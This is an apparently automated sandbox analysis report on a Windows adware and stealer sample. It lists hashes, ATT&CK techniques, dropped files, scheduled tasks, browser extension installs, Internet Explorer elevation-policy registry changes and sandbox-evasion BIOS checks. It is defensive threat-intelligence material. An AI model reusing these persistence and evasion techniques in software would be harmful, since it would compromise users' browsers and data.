a6896ef390d994a7ff4c9c07775ad15dbd207c72079a473389990d462ad81387

Analysis

max time kernel
116s
max time network
114s
platform
windows7_x64
resource
win7v20210408
submitted
21-06-2021 14:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

67897b2c1425411173ea7054d21a93e6.exe
Size

7.0MB
MD5

67897b2c1425411173ea7054d21a93e6
SHA1

d615b097aeb4af39a4c923e7e78dc8e2eeb5b8e6
SHA256

a6896ef390d994a7ff4c9c07775ad15dbd207c72079a473389990d462ad81387
SHA512

9a064a39b536646c129a643b326bbf7a656f008cc441cee78881bceaeaf586613874100c14c4de3726d97552e3897923d49a3251d538e0533aa0b5eef742b989

Score

10^/10

adware discovery evasion persistence spyware stealer trojan

Malware Config

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

9 2004 rundll32.exe
Executes dropped EXE 5 IoCs

Processes:

SimplInst.exeSimplInst.exegBGvkxp.exeQSmuyCT.exepzXmXPO.exe

pid process

2028 SimplInst.exe
1700 SimplInst.exe
1904 gBGvkxp.exe
1584 QSmuyCT.exe
924 pzXmXPO.exe

flow	pid	process
9	2004	rundll32.exe

pid	process
2028	SimplInst.exe
1700	SimplInst.exe
1904	gBGvkxp.exe
1584	QSmuyCT.exe
924	pzXmXPO.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Loads dropped DLL 13 IoCs

Processes:

67897b2c1425411173ea7054d21a93e6.exeSimplInst.exeSimplInst.exerundll32.exe

pid	process
1632	67897b2c1425411173ea7054d21a93e6.exe
2028	SimplInst.exe
2028	SimplInst.exe
2028	SimplInst.exe
2028	SimplInst.exe
2028	SimplInst.exe
1700	SimplInst.exe
1700	SimplInst.exe
1700	SimplInst.exe
2004	rundll32.exe
2004	rundll32.exe
2004	rundll32.exe
2004	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

Drops file in System32 directory 18 IoCs

Processes:

SimplInst.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exerundll32.exepowershell.exepowershell.EXEgBGvkxp.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXE

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	SimplInst.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	gBGvkxp.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	gBGvkxp.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Program Files directory 64 IoCs

Processes:

QSmuyCT.exe

description	ioc	process
File created	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	QSmuyCT.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\es\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\nl\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\piLDiRqvGTKTC\PxkfmEo.xml	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\cs\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\fa\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\he\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ru\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ar\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ja\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\pl\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ta\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\tr\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\be\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ca\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\ziCKAEV.exe	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\da\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\fr\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\hi\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\it\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sl\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\th\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR\ZVoUjWU.xml	QSmuyCT.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\Kernel.js	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sr\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sv\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\hu\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sq\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\mO48CE.dll	QSmuyCT.exe
File created	C:\Program Files (x86)\XpqoUDXlJoUn\KSMtjeK.dll	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\de\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\en\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\gu\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\id\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\kn\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ko\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\lv\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\uk\messages.json	QSmuyCT.exe
File opened for modification	C:\Program Files (x86)\VnDWhryCSIE\files\Kernel.js	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\background.html	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\et\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\mr\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\pt_PT\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sw\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\qDCCGhOyU\vpEBxrg.xml	QSmuyCT.exe
File created	C:\Program Files (x86)\mrDIPifxyaTU2\gOPnXLu.xml	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\bg\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\en_US\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\es_419\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\pt\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\sk\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\zh_CN\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\el\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\ro\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\vi\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\mrDIPifxyaTU2\kJRvGciDxDmDj.dll	QSmuyCT.exe
File created	C:\Program Files (x86)\qDCCGhOyU\JvcDDD.dll	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\en_GB\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\fil\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\files\_locales\te\messages.json	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\tjjvRAW.dll	QSmuyCT.exe
File created	C:\Program Files (x86)\VnDWhryCSIE\icon16.ico	QSmuyCT.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\pMLebdOaFqOcGSU.job	schtasks.exe
File created	C:\Windows\Tasks\bAvepIylLlkyPpwct.job	schtasks.exe
File created	C:\Windows\Tasks\bkckNrBYOjfprwtEPo.job	schtasks.exe
File created	C:\Windows\Tasks\lJLWniCkwZbjhapzm.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1232	schtasks.exe
1340	schtasks.exe
848	schtasks.exe
1660	schtasks.exe
1536	schtasks.exe
1400	schtasks.exe
1876	schtasks.exe
1592	schtasks.exe
900	schtasks.exe
1812	schtasks.exe
1216	schtasks.exe
1544	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	SimplInst.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies Internet Explorer settings 1 TTPs 19 IoCs

adware spyware

Modify Registry

T1112

Processes:

pzXmXPO.exeQSmuyCT.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	pzXmXPO.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	pzXmXPO.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	QSmuyCT.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\ziCKAEV.exe = "9999"	QSmuyCT.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	QSmuyCT.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights	QSmuyCT.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "ziCKAEV.exe"	QSmuyCT.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\VnDWhryCSIE"	QSmuyCT.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	QSmuyCT.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Approved Extensions	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\VnDWhryCSIE"	QSmuyCT.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	QSmuyCT.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	QSmuyCT.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MAIN	QSmuyCT.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	QSmuyCT.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{1A4355C3-1380-4565-8F0B-AE992134C31B} = 51667a6c4c1d3b1bd3495506b2430f0a9006e4d920778100	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "ziCKAEV.exe"	QSmuyCT.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	QSmuyCT.exe

Modifies data under HKEY_USERS 40 IoCs

Processes:

gBGvkxp.exewscript.exerundll32.exeQSmuyCT.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	gBGvkxp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	gBGvkxp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	QSmuyCT.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\fa-43-cb-33-5e-23	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-43-cb-33-5e-23\WpadDecision = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	gBGvkxp.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	QSmuyCT.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\WpadDecisionReason = "1"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-43-cb-33-5e-23	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a070029000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\WpadDecisionTime = 106e96f8be66d701	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\WpadDecision = "0"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-43-cb-33-5e-23\WpadDecisionTime = 106e96f8be66d701	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	QSmuyCT.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 505cccdfbe66d701	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fa-43-cb-33-5e-23\WpadDecisionReason = "1"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000706aaddfbe66d701	gBGvkxp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	gBGvkxp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3A33DB50-CC69-497D-AB93-6EAB524EB9A7}\WpadNetworkName = "Network"	rundll32.exe

Modifies registry class 64 IoCs

Processes:

QSmuyCT.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\VnDWhryCSIE\\kYCDidaec.dll"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_jeBzlVqRuIGFOqQBwZkYGeuXGR"	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IQGKeKDyerbxjhpLMFJM"	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\Version = "1.0"	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Programmable	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32	QSmuyCT.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\FLAGS	QSmuyCT.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	QSmuyCT.exe
